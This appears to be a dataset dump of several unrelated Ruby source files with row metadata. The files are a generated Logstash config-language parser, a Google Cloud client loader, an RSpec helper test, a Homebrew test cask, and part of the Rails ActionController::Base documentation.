return cached
end
i0, s0 = index, []
if has_terminal?("if", false, index)
r1 = instantiate_node(SyntaxNode,input, index...(index + 2))
@index += 2
else
terminal_parse_failure("if")
r1 = nil
end
s0 << r1
if r1
r2 = _nt__
s0 << r2
if r2
r3 = _nt_condition
s0 << r3
if r3
r4 = _nt__
s0 << r4
if r4
if has_terminal?("{", false, index)
r5 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("{")
r5 = nil
end
s0 << r5
if r5
r6 = _nt__
s0 << r6
if r6
s7, i7 = [], index
loop do
i8, s8 = index, []
r9 = _nt_branch_or_plugin
s8 << r9
if r9
r10 = _nt__
s8 << r10
end
if s8.last
r8 = instantiate_node(SyntaxNode,input, i8...index, s8)
r8.extend(If0)
else
@index = i8
r8 = nil
end
if r8
s7 << r8
else
break
end
end
r7 = instantiate_node(SyntaxNode,input, i7...index, s7)
s0 << r7
if r7
if has_terminal?("}", false, index)
r11 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("}")
r11 = nil
end
s0 << r11
end
end
end
end
end
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::If,input, i0...index, s0)
r0.extend(If1)
else
@index = i0
r0 = nil
end
node_cache[:if][start_index] = r0
r0
end
module ElseIf0
def branch_or_plugin
elements[0]
end
def _
elements[1]
end
end
module ElseIf1
def _1
elements[1]
end
def _2
elements[3]
end
def condition
elements[4]
end
def _3
elements[5]
end
def _4
elements[7]
end
end
def _nt_else_if
start_index = index
if node_cache[:else_if].has_key?(index)
cached = node_cache[:else_if][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
if has_terminal?("else", false, index)
r1 = instantiate_node(SyntaxNode,input, index...(index + 4))
@index += 4
else
terminal_parse_failure("else")
r1 = nil
end
s0 << r1
if r1
r2 = _nt__
s0 << r2
if r2
if has_terminal?("if", false, index)
r3 = instantiate_node(SyntaxNode,input, index...(index + 2))
@index += 2
else
terminal_parse_failure("if")
r3 = nil
end
s0 << r3
if r3
r4 = _nt__
s0 << r4
if r4
r5 = _nt_condition
s0 << r5
if r5
r6 = _nt__
s0 << r6
if r6
if has_terminal?("{", false, index)
r7 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("{")
r7 = nil
end
s0 << r7
if r7
r8 = _nt__
s0 << r8
if r8
s9, i9 = [], index
loop do
i10, s10 = index, []
r11 = _nt_branch_or_plugin
s10 << r11
if r11
r12 = _nt__
s10 << r12
end
if s10.last
r10 = instantiate_node(SyntaxNode,input, i10...index, s10)
r10.extend(ElseIf0)
else
@index = i10
r10 = nil
end
if r10
s9 << r10
else
break
end
end
r9 = instantiate_node(SyntaxNode,input, i9...index, s9)
s0 << r9
if r9
if has_terminal?("}", false, index)
r13 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("}")
r13 = nil
end
s0 << r13
end
end
end
end
end
end
end
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::Elsif,input, i0...index, s0)
r0.extend(ElseIf1)
else
@index = i0
r0 = nil
end
node_cache[:else_if][start_index] = r0
r0
end
module Else0
def branch_or_plugin
elements[0]
end
def _
elements[1]
end
end
module Else1
def _1
elements[1]
end
def _2
elements[3]
end
end
def _nt_else
start_index = index
if node_cache[:else].has_key?(index)
cached = node_cache[:else][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
if has_terminal?("else", false, index)
r1 = instantiate_node(SyntaxNode,input, index...(index + 4))
@index += 4
else
terminal_parse_failure("else")
r1 = nil
end
s0 << r1
if r1
r2 = _nt__
s0 << r2
if r2
if has_terminal?("{", false, index)
r3 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("{")
r3 = nil
end
s0 << r3
if r3
r4 = _nt__
s0 << r4
if r4
s5, i5 = [], index
loop do
i6, s6 = index, []
r7 = _nt_branch_or_plugin
s6 << r7
if r7
r8 = _nt__
s6 << r8
end
if s6.last
r6 = instantiate_node(SyntaxNode,input, i6...index, s6)
r6.extend(Else0)
else
@index = i6
r6 = nil
end
if r6
s5 << r6
else
break
end
end
r5 = instantiate_node(SyntaxNode,input, i5...index, s5)
s0 << r5
if r5
if has_terminal?("}", false, index)
r9 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("}")
r9 = nil
end
s0 << r9
end
end
end
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::Else,input, i0...index, s0)
r0.extend(Else1)
else
@index = i0
r0 = nil
end
node_cache[:else][start_index] = r0
r0
end
module Condition0
def _1
elements[0]
end
def boolean_operator
elements[1]
end
def _2
elements[2]
end
def expression
elements[3]
end
end
module Condition1
def expression
elements[0]
end
end
def _nt_condition
start_index = index
if node_cache[:condition].has_key?(index)
cached = node_cache[:condition][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
r1 = _nt_expression
s0 << r1
if r1
s2, i2 = [], index
loop do
i3, s3 = index, []
r4 = _nt__
s3 << r4
if r4
r5 = _nt_boolean_operator
s3 << r5
if r5
r6 = _nt__
s3 << r6
if r6
r7 = _nt_expression
s3 << r7
end
end
end
if s3.last
r3 = instantiate_node(SyntaxNode,input, i3...index, s3)
r3.extend(Condition0)
else
@index = i3
r3 = nil
end
if r3
s2 << r3
else
break
end
end
r2 = instantiate_node(SyntaxNode,input, i2...index, s2)
s0 << r2
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::Condition,input, i0...index, s0)
r0.extend(Condition1)
else
@index = i0
r0 = nil
end
node_cache[:condition][start_index] = r0
r0
end
module Expression0
def _1
elements[1]
end
def condition
elements[2]
end
def _2
elements[3]
end
end
def _nt_expression
start_index = index
if node_cache[:expression].has_key?(index)
cached = node_cache[:expression][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0 = index
i1, s1 = index, []
if has_terminal?("(", false, index)
r2 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("(")
r2 = nil
end
s1 << r2
if r2
r3 = _nt__
s1 << r3
if r3
r4 = _nt_condition
s1 << r4
if r4
r5 = _nt__
s1 << r5
if r5
if has_terminal?(")", false, index)
r6 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure(")")
r6 = nil
end
s1 << r6
end
end
end
end
if s1.last
r1 = instantiate_node(SyntaxNode,input, i1...index, s1)
r1.extend(Expression0)
else
@index = i1
r1 = nil
end
if r1
r0 = r1
r0.extend(LogStash::Config::AST::Expression)
else
r7 = _nt_negative_expression
if r7
r0 = r7
r0.extend(LogStash::Config::AST::Expression)
else
r8 = _nt_in_expression
if r8
r0 = r8
r0.extend(LogStash::Config::AST::Expression)
else
r9 = _nt_not_in_expression
if r9
r0 = r9
r0.extend(LogStash::Config::AST::Expression)
else
r10 = _nt_compare_expression
if r10
r0 = r10
r0.extend(LogStash::Config::AST::Expression)
else
r11 = _nt_regexp_expression
if r11
r0 = r11
r0.extend(LogStash::Config::AST::Expression)
else
r12 = _nt_rvalue
if r12
r0 = r12
r0.extend(LogStash::Config::AST::Expression)
else
@index = i0
r0 = nil
end
end
end
end
end
end
end
node_cache[:expression][start_index] = r0
r0
end
module NegativeExpression0
def _1
elements[1]
end
def _2
elements[3]
end
def condition
elements[4]
end
def _3
elements[5]
end
end
module NegativeExpression1
def _
elements[1]
end
def selector
elements[2]
end
end
def _nt_negative_expression
start_index = index
if node_cache[:negative_expression].has_key?(index)
cached = node_cache[:negative_expression][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0 = index
i1, s1 = index, []
if has_terminal?("!", false, index)
r2 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("!")
r2 = nil
end
s1 << r2
if r2
r3 = _nt__
s1 << r3
if r3
if has_terminal?("(", false, index)
r4 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("(")
r4 = nil
end
s1 << r4
if r4
r5 = _nt__
s1 << r5
if r5
r6 = _nt_condition
s1 << r6
if r6
r7 = _nt__
s1 << r7
if r7
if has_terminal?(")", false, index)
r8 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure(")")
r8 = nil
end
s1 << r8
end
end
end
end
end
end
if s1.last
r1 = instantiate_node(SyntaxNode,input, i1...index, s1)
r1.extend(NegativeExpression0)
else
@index = i1
r1 = nil
end
if r1
r0 = r1
r0.extend(LogStash::Config::AST::NegativeExpression)
else
i9, s9 = index, []
if has_terminal?("!", false, index)
r10 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("!")
r10 = nil
end
s9 << r10
if r10
r11 = _nt__
s9 << r11
if r11
r12 = _nt_selector
s9 << r12
end
end
if s9.last
r9 = instantiate_node(SyntaxNode,input, i9...index, s9)
r9.extend(NegativeExpression1)
else
@index = i9
r9 = nil
end
if r9
r0 = r9
r0.extend(LogStash::Config::AST::NegativeExpression)
else
@index = i0
r0 = nil
end
end
node_cache[:negative_expression][start_index] = r0
r0
end
module InExpression0
def rvalue1
elements[0]
end
def _1
elements[1]
end
def in_operator
elements[2]
end
def _2
elements[3]
end
def rvalue2
elements[4]
end
end
def _nt_in_expression
start_index = index
if node_cache[:in_expression].has_key?(index)
cached = node_cache[:in_expression][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
r1 = _nt_rvalue
s0 << r1
if r1
r2 = _nt__
s0 << r2
if r2
r3 = _nt_in_operator
s0 << r3
if r3
r4 = _nt__
s0 << r4
if r4
r5 = _nt_rvalue
s0 << r5
end
end
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::InExpression,input, i0...index, s0)
r0.extend(InExpression0)
else
@index = i0
r0 = nil
end
node_cache[:in_expression][start_index] = r0
r0
end
module NotInExpression0
def rvalue1
elements[0]
end
def _1
elements[1]
end
def not_in_operator
elements[2]
end
def _2
elements[3]
end
def rvalue2
elements[4]
end
end
def _nt_not_in_expression
start_index = index
if node_cache[:not_in_expression].has_key?(index)
cached = node_cache[:not_in_expression][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
r1 = _nt_rvalue
s0 << r1
if r1
r2 = _nt__
s0 << r2
if r2
r3 = _nt_not_in_operator
s0 << r3
if r3
r4 = _nt__
s0 << r4
if r4
r5 = _nt_rvalue
s0 << r5
end
end
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::NotInExpression,input, i0...index, s0)
r0.extend(NotInExpression0)
else
@index = i0
r0 = nil
end
node_cache[:not_in_expression][start_index] = r0
r0
end
def _nt_in_operator
start_index = index
if node_cache[:in_operator].has_key?(index)
cached = node_cache[:in_operator][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
if has_terminal?("in", false, index)
r0 = instantiate_node(SyntaxNode,input, index...(index + 2))
@index += 2
else
terminal_parse_failure("in")
r0 = nil
end
node_cache[:in_operator][start_index] = r0
r0
end
module NotInOperator0
def _
elements[1]
end
end
def _nt_not_in_operator
start_index = index
if node_cache[:not_in_operator].has_key?(index)
cached = node_cache[:not_in_operator][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
if has_terminal?("not ", false, index)
r1 = instantiate_node(SyntaxNode,input, index...(index + 4))
@index += 4
else
terminal_parse_failure("not ")
r1 = nil
end
s0 << r1
if r1
r2 = _nt__
s0 << r2
if r2
if has_terminal?("in", false, index)
r3 = instantiate_node(SyntaxNode,input, index...(index + 2))
@index += 2
else
terminal_parse_failure("in")
r3 = nil
end
s0 << r3
end
end
if s0.last
r0 = instantiate_node(SyntaxNode,input, i0...index, s0)
r0.extend(NotInOperator0)
else
@index = i0
r0 = nil
end
node_cache[:not_in_operator][start_index] = r0
r0
end
def _nt_rvalue
start_index = index
if node_cache[:rvalue].has_key?(index)
cached = node_cache[:rvalue][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0 = index
r1 = _nt_string
if r1
r0 = r1
else
r2 = _nt_number
if r2
r0 = r2
else
r3 = _nt_selector
if r3
r0 = r3
else
r4 = _nt_array
if r4
r0 = r4
else
r5 = _nt_method_call
if r5
r0 = r5
else
r6 = _nt_regexp
if r6
r0 = r6
else
@index = i0
r0 = nil
end
end
end
end
end
end
node_cache[:rvalue][start_index] = r0
r0
end
module MethodCall0
def _1
elements[0]
end
def _2
elements[2]
end
def rvalue
elements[3]
end
end
module MethodCall1
def rvalue
elements[0]
end
end
module MethodCall2
def method
elements[0]
end
def _1
elements[1]
end
def _2
elements[3]
end
def _3
elements[5]
end
end
def _nt_method_call
start_index = index
if node_cache[:method_call].has_key?(index)
cached = node_cache[:method_call][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
r1 = _nt_method
s0 << r1
if r1
r2 = _nt__
s0 << r2
if r2
if has_terminal?("(", false, index)
r3 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("(")
r3 = nil
end
s0 << r3
if r3
r4 = _nt__
s0 << r4
if r4
i6, s6 = index, []
r7 = _nt_rvalue
s6 << r7
if r7
s8, i8 = [], index
loop do
i9, s9 = index, []
r10 = _nt__
s9 << r10
if r10
if has_terminal?(",", false, index)
r11 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure(",")
r11 = nil
end
s9 << r11
if r11
r12 = _nt__
s9 << r12
if r12
r13 = _nt_rvalue
s9 << r13
end
end
end
if s9.last
r9 = instantiate_node(SyntaxNode,input, i9...index, s9)
r9.extend(MethodCall0)
else
@index = i9
r9 = nil
end
if r9
s8 << r9
else
break
end
end
r8 = instantiate_node(SyntaxNode,input, i8...index, s8)
s6 << r8
end
if s6.last
r6 = instantiate_node(SyntaxNode,input, i6...index, s6)
r6.extend(MethodCall1)
else
@index = i6
r6 = nil
end
if r6
r5 = r6
else
r5 = instantiate_node(SyntaxNode,input, index...index)
end
s0 << r5
if r5
r14 = _nt__
s0 << r14
if r14
if has_terminal?(")", false, index)
r15 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure(")")
r15 = nil
end
s0 << r15
end
end
end
end
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::MethodCall,input, i0...index, s0)
r0.extend(MethodCall2)
else
@index = i0
r0 = nil
end
node_cache[:method_call][start_index] = r0
r0
end
def _nt_method
start_index = index
if node_cache[:method].has_key?(index)
cached = node_cache[:method][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
r0 = _nt_bareword
node_cache[:method][start_index] = r0
r0
end
module CompareExpression0
def rvalue1
elements[0]
end
def _1
elements[1]
end
def compare_operator
elements[2]
end
def _2
elements[3]
end
def rvalue2
elements[4]
end
end
def _nt_compare_expression
start_index = index
if node_cache[:compare_expression].has_key?(index)
cached = node_cache[:compare_expression][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
r1 = _nt_rvalue
s0 << r1
if r1
r2 = _nt__
s0 << r2
if r2
r3 = _nt_compare_operator
s0 << r3
if r3
r4 = _nt__
s0 << r4
if r4
r5 = _nt_rvalue
s0 << r5
end
end
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::ComparisonExpression,input, i0...index, s0)
r0.extend(CompareExpression0)
else
@index = i0
r0 = nil
end
node_cache[:compare_expression][start_index] = r0
r0
end
def _nt_compare_operator
start_index = index
if node_cache[:compare_operator].has_key?(index)
cached = node_cache[:compare_operator][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0 = index
if has_terminal?("==", false, index)
r1 = instantiate_node(SyntaxNode,input, index...(index + 2))
@index += 2
else
terminal_parse_failure("==")
r1 = nil
end
if r1
r0 = r1
r0.extend(LogStash::Config::AST::ComparisonOperator)
else
if has_terminal?("!=", false, index)
r2 = instantiate_node(SyntaxNode,input, index...(index + 2))
@index += 2
else
terminal_parse_failure("!=")
r2 = nil
end
if r2
r0 = r2
r0.extend(LogStash::Config::AST::ComparisonOperator)
else
if has_terminal?("<=", false, index)
r3 = instantiate_node(SyntaxNode,input, index...(index + 2))
@index += 2
else
terminal_parse_failure("<=")
r3 = nil
end
if r3
r0 = r3
r0.extend(LogStash::Config::AST::ComparisonOperator)
else
if has_terminal?(">=", false, index)
r4 = instantiate_node(SyntaxNode,input, index...(index + 2))
@index += 2
else
terminal_parse_failure(">=")
r4 = nil
end
if r4
r0 = r4
r0.extend(LogStash::Config::AST::ComparisonOperator)
else
if has_terminal?("<", false, index)
r5 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("<")
r5 = nil
end
if r5
r0 = r5
r0.extend(LogStash::Config::AST::ComparisonOperator)
else
if has_terminal?(">", false, index)
r6 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure(">")
r6 = nil
end
if r6
r0 = r6
r0.extend(LogStash::Config::AST::ComparisonOperator)
else
@index = i0
r0 = nil
end
end
end
end
end
end
node_cache[:compare_operator][start_index] = r0
r0
end
module RegexpExpression0
def rvalue
elements[0]
end
def _1
elements[1]
end
def regexp_operator
elements[2]
end
def _2
elements[3]
end
end
def _nt_regexp_expression
start_index = index
if node_cache[:regexp_expression].has_key?(index)
cached = node_cache[:regexp_expression][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
r1 = _nt_rvalue
s0 << r1
if r1
r2 = _nt__
s0 << r2
if r2
r3 = _nt_regexp_operator
s0 << r3
if r3
r4 = _nt__
s0 << r4
if r4
i5 = index
r6 = _nt_string
if r6
r5 = r6
else
r7 = _nt_regexp
if r7
r5 = r7
else
@index = i5
r5 = nil
end
end
s0 << r5
end
end
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::RegexpExpression,input, i0...index, s0)
r0.extend(RegexpExpression0)
else
@index = i0
r0 = nil
end
node_cache[:regexp_expression][start_index] = r0
r0
end
def _nt_regexp_operator
start_index = index
if node_cache[:regexp_operator].has_key?(index)
cached = node_cache[:regexp_operator][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0 = index
if has_terminal?("=~", false, index)
r1 = instantiate_node(SyntaxNode,input, index...(index + 2))
@index += 2
else
terminal_parse_failure("=~")
r1 = nil
end
if r1
r0 = r1
r0.extend(LogStash::Config::AST::RegExpOperator)
else
if has_terminal?("!~", false, index)
r2 = instantiate_node(SyntaxNode,input, index...(index + 2))
@index += 2
else
terminal_parse_failure("!~")
r2 = nil
end
if r2
r0 = r2
r0.extend(LogStash::Config::AST::RegExpOperator)
else
@index = i0
r0 = nil
end
end
node_cache[:regexp_operator][start_index] = r0
r0
end
def _nt_boolean_operator
start_index = index
if node_cache[:boolean_operator].has_key?(index)
cached = node_cache[:boolean_operator][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0 = index
if has_terminal?("and", false, index)
r1 = instantiate_node(SyntaxNode,input, index...(index + 3))
@index += 3
else
terminal_parse_failure("and")
r1 = nil
end
if r1
r0 = r1
r0.extend(LogStash::Config::AST::BooleanOperator)
else
if has_terminal?("or", false, index)
r2 = instantiate_node(SyntaxNode,input, index...(index + 2))
@index += 2
else
terminal_parse_failure("or")
r2 = nil
end
if r2
r0 = r2
r0.extend(LogStash::Config::AST::BooleanOperator)
else
if has_terminal?("xor", false, index)
r3 = instantiate_node(SyntaxNode,input, index...(index + 3))
@index += 3
else
terminal_parse_failure("xor")
r3 = nil
end
if r3
r0 = r3
r0.extend(LogStash::Config::AST::BooleanOperator)
else
if has_terminal?("nand", false, index)
r4 = instantiate_node(SyntaxNode,input, index...(index + 4))
@index += 4
else
terminal_parse_failure("nand")
r4 = nil
end
if r4
r0 = r4
r0.extend(LogStash::Config::AST::BooleanOperator)
else
@index = i0
r0 = nil
end
end
end
end
node_cache[:boolean_operator][start_index] = r0
r0
end
def _nt_selector
start_index = index
if node_cache[:selector].has_key?(index)
cached = node_cache[:selector][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
s0, i0 = [], index
loop do
r1 = _nt_selector_element
if r1
s0 << r1
else
break
end
end
if s0.empty?
@index = i0
r0 = nil
else
r0 = instantiate_node(LogStash::Config::AST::Selector,input, i0...index, s0)
end
node_cache[:selector][start_index] = r0
r0
end
module SelectorElement0
end
def _nt_selector_element
start_index = index
if node_cache[:selector_element].has_key?(index)
cached = node_cache[:selector_element][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
if has_terminal?("[", false, index)
r1 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("[")
r1 = nil
end
s0 << r1
if r1
s2, i2 = [], index
loop do
if has_terminal?('\G[^\\], ]', true, index)
r3 = true
@index += 1
else
r3 = nil
end
if r3
s2 << r3
else
break
end
end
if s2.empty?
@index = i2
r2 = nil
else
r2 = instantiate_node(SyntaxNode,input, i2...index, s2)
end
s0 << r2
if r2
if has_terminal?("]", false, index)
r4 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("]")
r4 = nil
end
s0 << r4
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::SelectorElement,input, i0...index, s0)
r0.extend(SelectorElement0)
else
@index = i0
r0 = nil
end
node_cache[:selector_element][start_index] = r0
r0
end
end
class LogStashConfigParser < Treetop::Runtime::CompiledParser
include LogStashConfig
end
| 21.157534 | 94 | 0.477056 |
7a60d9b50e3f483b7a7dbdeb8692641027e7d86a | 1,370 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
require "google/cloud/osconfig/agentendpoint/v1beta/agent_endpoint_service"
require "google/cloud/agentendpoint/v1beta/version"
module Google
module Cloud
module Osconfig
module Agentendpoint
##
# To load this package, including all its services, and instantiate a client:
#
# require "google/cloud/osconfig/agentendpoint/v1beta"
# client = ::Google::Cloud::Osconfig::Agentendpoint::V1beta::AgentEndpointService::Client.new
#
module V1beta
end
end
end
end
end
helper_path = ::File.join __dir__, "v1beta", "_helpers.rb"
require "google/cloud/osconfig/agentendpoint/v1beta/_helpers" if ::File.file? helper_path
| 33.414634 | 105 | 0.726277 |
d50daa39369e18dc39efca899a9e2c0e8fd023c4 | 1,159 | describe ServiceHelper::TextualSummary do
describe ".textual_orchestration_stack" do
let(:os_cloud) { FactoryGirl.create(:orchestration_stack_cloud, :name => "cloudstack1") }
let(:os_infra) { FactoryGirl.create(:orchestration_stack_openstack_infra, :name => "infrastack1") }
before do
login_as FactoryGirl.create(:user)
end
subject { textual_orchestration_stack }
it 'contains the link to the associated cloud stack' do
@record = FactoryGirl.create(:service)
allow(@record).to receive(:orchestration_stack).and_return(os_cloud)
expect(textual_orchestration_stack).to eq(os_cloud)
end
it 'contains the link to the associated infra stack' do
@record = FactoryGirl.create(:service)
allow(@record).to receive(:orchestration_stack).and_return(os_infra)
expect(textual_orchestration_stack).to eq(os_infra)
end
it 'contains no link for an invalid stack' do
os_infra.id = nil
@record = FactoryGirl.create(:service)
allow(@record).to receive(:orchestration_stack).and_return(os_infra)
expect(textual_orchestration_stack[:link]).to be_nil
end
end
end
| 37.387097 | 103 | 0.725626 |
ed1b82599c179cd6c199ece0a8d4be404cef1a1e | 258 | class GzippedAsset < TestCask
version '1.2.3'
sha256 '832506ade94b3e41ecdf2162654eb75891a0749803229e82b2e0420fd1b9e8d2'
url TestHelper.local_binary_url('gzipped_asset.gz')
homepage 'http://example.com/gzipped-asset'
app 'gzipped-asset-1.2.3'
end
| 25.8 | 75 | 0.790698 |
3378d6db0fbd4dad9924cc12510a294485f4fe13 | 11,214 | # frozen_string_literal: true
require "action_view"
require "action_controller/log_subscriber"
require "action_controller/metal/params_wrapper"
module ActionController
# Action Controllers are the core of a web request in \Rails. They are made up of one or more actions that are executed
# on request and then either it renders a template or redirects to another action. An action is defined as a public method
# on the controller, which will automatically be made accessible to the web-server through \Rails Routes.
#
# By default, only the ApplicationController in a \Rails application inherits from <tt>ActionController::Base</tt>. All other
# controllers inherit from ApplicationController. This gives you one class to configure things such as
# request forgery protection and filtering of sensitive request parameters.
#
# A sample controller could look like this:
#
# class PostsController < ApplicationController
# def index
# @posts = Post.all
# end
#
# def create
# @post = Post.create params[:post]
# redirect_to posts_path
# end
# end
#
# Actions, by default, render a template in the <tt>app/views</tt> directory corresponding to the name of the controller and action
# after executing code in the action. For example, the +index+ action of the PostsController would render the
# template <tt>app/views/posts/index.html.erb</tt> by default after populating the <tt>@posts</tt> instance variable.
#
# Unlike index, the create action will not render a template. After performing its main purpose (creating a
# new post), it initiates a redirect instead. This redirect works by returning an external
# <tt>302 Moved</tt> HTTP response that takes the user to the index action.
#
# These two methods represent the two basic action archetypes used in Action Controllers: Get-and-show and do-and-redirect.
# Most actions are variations on these themes.
#
# == Requests
#
# For every request, the router determines the value of the +controller+ and +action+ keys. These determine which controller
# and action are called. The remaining request parameters, the session (if one is available), and the full request with
# all the HTTP headers are made available to the action through accessor methods. Then the action is performed.
#
# The full request object is available via the request accessor and is primarily used to query for HTTP headers:
#
# def server_ip
# location = request.env["REMOTE_ADDR"]
# render plain: "This server hosted at #{location}"
# end
#
# == Parameters
#
# All request parameters, whether they come from a query string in the URL or form data submitted through a POST request are
# available through the <tt>params</tt> method which returns a hash. For example, an action that was performed through
# <tt>/posts?category=All&limit=5</tt> will include <tt>{ "category" => "All", "limit" => "5" }</tt> in <tt>params</tt>.
#
# It's also possible to construct multi-dimensional parameter hashes by specifying keys using brackets, such as:
#
# <input type="text" name="post[name]" value="david">
# <input type="text" name="post[address]" value="hyacintvej">
#
# A request coming from a form holding these inputs will include <tt>{ "post" => { "name" => "david", "address" => "hyacintvej" } }</tt>.
# If the address input had been named <tt>post[address][street]</tt>, the <tt>params</tt> would have included
# <tt>{ "post" => { "address" => { "street" => "hyacintvej" } } }</tt>. There's no limit to the depth of the nesting.
#
# == Sessions
#
# Sessions allow you to store objects in between requests. This is useful for objects that are not yet ready to be persisted,
# such as a Signup object constructed in a multi-paged process, or objects that don't change much and are needed all the time, such
# as a User object for a system that requires login. The session should not be used, however, as a cache for objects where it's likely
# they could be changed unknowingly. It's usually too much work to keep it all synchronized -- something databases already excel at.
#
# You can place objects in the session by using the <tt>session</tt> method, which accesses a hash:
#
# session[:person] = Person.authenticate(user_name, password)
#
# You can retrieve it again through the same hash:
#
# Hello #{session[:person]}
#
# For removing objects from the session, you can either assign a single key to +nil+:
#
# # removes :person from session
# session[:person] = nil
#
# or you can remove the entire session with +reset_session+.
#
# Sessions are stored by default in a browser cookie that's cryptographically signed, but unencrypted.
# This prevents the user from tampering with the session but also allows them to see its contents.
#
# Do not put secret information in cookie-based sessions!
#
# == Responses
#
# Each action results in a response, which holds the headers and document to be sent to the user's browser. The actual response
# object is generated automatically through the use of renders and redirects and requires no user intervention.
#
# == Renders
#
# Action Controller sends content to the user by using one of five rendering methods. The most versatile and common is the rendering
# of a template. Included in the Action Pack is the Action View, which enables rendering of ERB templates. It's automatically configured.
# The controller passes objects to the view by assigning instance variables:
#
# def show
# @post = Post.find(params[:id])
# end
#
# Which are then automatically available to the view:
#
# Title: <%= @post.title %>
#
# You don't have to rely on the automated rendering. For example, actions that could result in the rendering of different templates
# will use the manual rendering methods:
#
# def search
# @results = Search.find(params[:query])
# case @results.count
# when 0 then render action: "no_results"
# when 1 then render action: "show"
# when 2..10 then render action: "show_many"
# end
# end
#
# Read more about writing ERB and Builder templates in ActionView::Base.
#
# == Redirects
#
# Redirects are used to move from one action to another. For example, after a <tt>create</tt> action, which stores a blog entry to the
# database, we might like to show the user the new entry. Because we're following good DRY principles (Don't Repeat Yourself), we're
# going to reuse (and redirect to) a <tt>show</tt> action that we'll assume has already been created. The code might look like this:
#
# def create
# @entry = Entry.new(params[:entry])
# if @entry.save
# # The entry was saved correctly, redirect to show
# redirect_to action: 'show', id: @entry.id
# else
# # things didn't go so well, do something else
# end
# end
#
# In this case, after saving our new entry to the database, the user is redirected to the <tt>show</tt> method, which is then executed.
# Note that this is an external HTTP-level redirection which will cause the browser to make a second request (a GET to the show action),
# and not some internal re-routing which calls both "create" and then "show" within one request.
#
# Learn more about <tt>redirect_to</tt> and what options you have in ActionController::Redirecting.
#
# == Calling multiple redirects or renders
#
